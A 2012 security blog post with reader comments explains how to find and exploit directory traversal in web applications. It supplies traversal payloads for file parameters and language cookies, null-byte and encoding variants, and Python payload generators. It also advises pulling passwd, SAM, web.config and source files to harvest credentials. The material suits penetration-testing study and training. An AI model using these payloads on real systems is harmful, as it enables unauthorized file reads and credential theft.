Friday, February 17, 2012

Hunting & Exploiting Directory Traversal

In cktricky's last post he provided a great outline on the ins and outs of leveraging Burp's built-in support for directory traversal testing.  There are two questions, however, that should immediately come to mind once you are familiar with this tool:  How do I find directory traversal, and what should I look for if I do?

Finding directory traversal is the hunt for dynamic file retrieval or modification.  The opposite, static file retrieval, is when the browser is delegated the request for a file on the server.  In other words, every <a href>, CSS call for a file/location, and even most JavaScript calls can be considered static.  You could copy the path of those requests into the browser address bar and grab the file yourself-- because that is pretty much what the browser is doing for you.  Dynamic file retrieval, however, is when you request a server-side page/function which serves you a file.  Think of it as the difference between calling someone directly on the phone vs. calling an operator who calls that person and patches you in.

Dynamic file serving takes place for a variety of reasons, such as: user content download locations, dynamic image rendering/resizing features, template engines, language parameters*, AJAX-to-service type calls, sometimes cookies, and occasionally how pages themselves get served.  These all basically look something like:

    GET /download.aspx?file=statement.pdf
    GET /image/resize?img=logo.png&width=200
    GET /page?template=main.tpl
The path to the file can be either relative (../../../etc) or, in some rarer cases, absolute (c:/windows/boot.ini).  Additionally, these requests might be base64 or ROT13 encoded, or sometimes encrypted.  Neither is a showstopper.
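For the encoded cases, Burp's Decoder or a couple of lines of Python will recover and re-wrap a payload. A quick sketch (the payload and the choice of encodings here are illustrative, not tied to any particular target):

```python
import base64
import codecs

# A traversal payload as it would appear before encoding.
payload = "../../../etc/passwd"

# Some applications base64-encode file parameters; the payload survives intact.
b64 = base64.b64encode(payload.encode()).decode()
print(b64)  # Li4vLi4vLi4vZXRjL3Bhc3N3ZA==

# Others apply ROT13 (letters only; dots and slashes pass through unchanged).
rot13 = codecs.encode(payload, "rot_13")
print(rot13)  # ../../../rgp/cnffjq

# Round-trip to confirm neither transformation loses the traversal sequence.
assert base64.b64decode(b64).decode() == payload
assert codecs.decode(rot13, "rot_13") == payload
```

Encrypted parameters are harder, but if the application decrypts whatever you send, replaying a captured value with a modified plaintext (when you can get one) follows the same pattern.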

You might think language parameters are an odd location for directory traversal, but after talking with my co-workers*, they reminded me about dynamic file modification.  Some frameworks use parameters (such as language) to prefix a directory to the request or alter the file name for the appropriate language.  Ergo:

    cookie: language=en-us;

    could turn into:

    File.Open('/' + language + '/' + some-file);
    File.Open('/' + language + '.' + some-file);

If that is true, you can alter the root of a request, then use terminators to kill off the rest of what gets appended (null chars ftw), such as:

    cookie: language=../../../../../etc/passwd%00
    cookie: language=../../../../../etc/passwd;

Language, template/skin name, and occasionally environment-type variables (such as location=PROD, DEBUG, etc...) all fit this pattern.  Anything that might be prefixed to a file name or directory to search is fair game.
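The prefix case is easiest to see in code. A minimal sketch of the vulnerable pattern (the paths and function names are made up, not from any specific framework):

```python
import os.path

def resolve_language_file(language: str, page: str) -> str:
    """Vulnerable: the cookie value is prefixed to the path unchecked."""
    return os.path.normpath("/var/www/templates/" + language + "/" + page)

# Expected use: cookie language=en-us serves the localized template.
print(resolve_language_file("en-us", "home.html"))
# /var/www/templates/en-us/home.html

# Malicious cookie: enough ../ sequences walk out of the template root.
print(resolve_language_file("../../../../../etc/passwd", "home.html"))
# /etc/passwd/home.html
```

Note that the appended "/home.html" still trails the traversal; that trailing suffix is exactly what the null-byte terminator was historically used to discard on C-backed runtimes (and why a fuzzer that never tries terminators misses this whole class).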

Now what?

Once you've identified a location which appears to be ripe for the testing-- how do you verify and what would you do?  To verify, I have found two approaches that work well: default files & known files.

The first approach is based on looking for default files on the file system.  Since you are mostly blind to what exists on a server, you look for the existence of these defaults to see if they can be retrieved.  There are two resources I've found helpful.  The first is Mubix's list of post-exploitation commands.  In addition to a helpful list of post-exploit commands, it includes very common files you might want to look for and steal (by operating system).  The second resource is the Apache default layout per OS.  This can be really useful if you are attacking a system running Apache, to grab known configurations.  For non-Apache web servers, I usually install them locally and see what the default layout looks like manually.
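Generating the candidates is easy to mechanize. A sketch, assuming a hypothetical vulnerable parameter and a small sample of default files (real lists, like Mubix's, go much further):

```python
# A small sample of default files worth checking, keyed by OS.
DEFAULT_FILES = {
    "unix": ["etc/passwd", "etc/hosts", "etc/apache2/apache2.conf"],
    "windows": ["windows/win.ini", "boot.ini"],
}

def candidate_payloads(target_os: str, max_depth: int = 8):
    """Yield traversal strings at increasing ../ depths for each default file.

    You rarely know how deep the serving directory sits, so you try a range
    of depths; extra ../ beyond the root is usually harmless on Unix.
    """
    for path in DEFAULT_FILES[target_os]:
        for depth in range(1, max_depth + 1):
            yield "../" * depth + path

payloads = list(candidate_payloads("unix", max_depth=2))
print(payloads[0])  # ../etc/passwd
```

Each candidate would then be dropped into the suspect parameter (e.g. via Burp Intruder) and the responses compared for size or content differences.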

The second approach comes into play if the first fails (and it might) because the user context of the site doesn't have the authority to access those files.  So you have to request files you can be reasonably sure it has access to-- the web pages it already serves.  In this approach you attempt to serve other parts of the web site, relative to the location you are currently looking at.  As a contrived example, say you see a layout something like:

    /app/index.jsp
    /app/files/report.pdf
    /app/download?file=report.pdf

you'd test for:

    /app/download?file=../index.jsp
Since you know that the user-context of the site has the authority to serve those pages, it -should- be a fairly practical way to verify if your directory traversal is working.  You may even get back source code this way. :-)
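If you know (or can guess) where the vulnerable handler reads from, the traversal string to reach a known-served page is just a relative path computation. A sketch with entirely hypothetical paths:

```python
import posixpath

def traversal_to(serving_dir: str, target_path: str) -> str:
    """Return the relative traversal string from the directory the
    vulnerable handler reads from to a file the site is known to serve."""
    return posixpath.relpath(target_path, start=serving_dir)

# If downloads are read from /var/www/app/files and the site serves
# /var/www/app/index.jsp, the payload to fetch its source would be:
print(traversal_to("/var/www/app/files", "/var/www/app/index.jsp"))
# ../index.jsp
```

In practice you won't know the absolute layout up front, so you walk the depth upward (../, ../../, ...) until a known page comes back.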

If you are attempting to take over the server, you should be looking to steal resources which would help you with that (such as the passwd & SAM files).  If you are attempting to do an involuntary code review, you should steal the source code of the pages you are looking at.  You will occasionally find hard-coded credentials in source, but application configuration files are often gold for credentials.  I've found database credentials, admin users, SMTP credentials, and FTP users this way.

Some final things to consider:
  • Most operating systems support environment variables/shortcuts for locations, such as %home% or ~.  This is useful to remember if there are protections against using a period or two successive periods.
  • When dynamic features serve files, they often violate other protections.  In IIS, for instance, various extensions cannot be served by the server (.config files, for example).  However, in most directory traversals you can pull the web.config file out w/o many problems.
  • User-controlled uploads often get served dynamically because there isn't a way for the server to know beforehand what the files are.  You can sometimes find directory traversal here by uploading files with weird paths in their names (or renaming them after upload).
  • Developers sometimes leave clues to files' physical locations in comments.  I once downloaded the source for an entire site because of this.
  • Image / gallery plugins for CMSes are notorious for directory traversal.
  • Error messages are your friend here.  If you get a system/application error instead of a file-not-found type error, you can at least use the mechanism to check for the existence of files.
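Several of the bullets above come down to trying alternate representations of the same payload. A sketch of a variant generator (which encodings actually slip past a given filter depends entirely on the target; these are just common ones):

```python
from urllib.parse import quote

def variants(payload: str):
    """Yield common representations of one traversal payload, for filters
    that block the literal characters but decode the input later."""
    yield payload                          # raw: ../../etc/passwd
    yield quote(payload, safe="")          # slashes URL-encoded: ..%2F..%2F...
    yield payload.replace(".", "%2e")      # dots URL-encoded: %2e%2e/
    yield payload + "%00"                  # null terminator for appended suffixes
    yield payload + "%00.jpg"              # keep an "allowed" extension visible

for v in variants("../../etc/passwd"):
    print(v)
```

Feeding the whole set through an intercepting proxy per parameter is usually faster than hand-testing each form.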
Happy Hunting.


* Thanks DC & AJ



nitr0us said...

You could use our fuzzer to discover Directory Traversal vulnerabilities ;-)

Cheers !

CG said...

ewww perl... :-)

Anonymous said...

nitr0us: Personally, I don't like showing people tools until they can prove they can do something manually.

That said, I haven't really used your tool much before. I did a quick review of some source, and didn't see anything related to null/termination at the end of strings. If I didn't see it, I'd love to know where it is. Without that you might miss a whole set of directory traversal vulns where the parameter is prefixed to a file name.

nitr0us said...

kizushi, thanks for your comments !

Well, the null termination is located in
my @Special_Sufixes = ("", "index.html", "index.htm", ";index.html", ";index.htm");

Also, you can specify it through the -e parameter (file extension, e.g. .jpg)

I hope it helps and again, thanks for your feedback !


Rezorcinol said...

When I start Burp active scanner, it will automatically try to find file traversal vulnerabilities. Is it needed to perform the search manually even if you have already launched active scanner? In other words - can I rely on Burp active scanner to find file traversal vulnerabilities?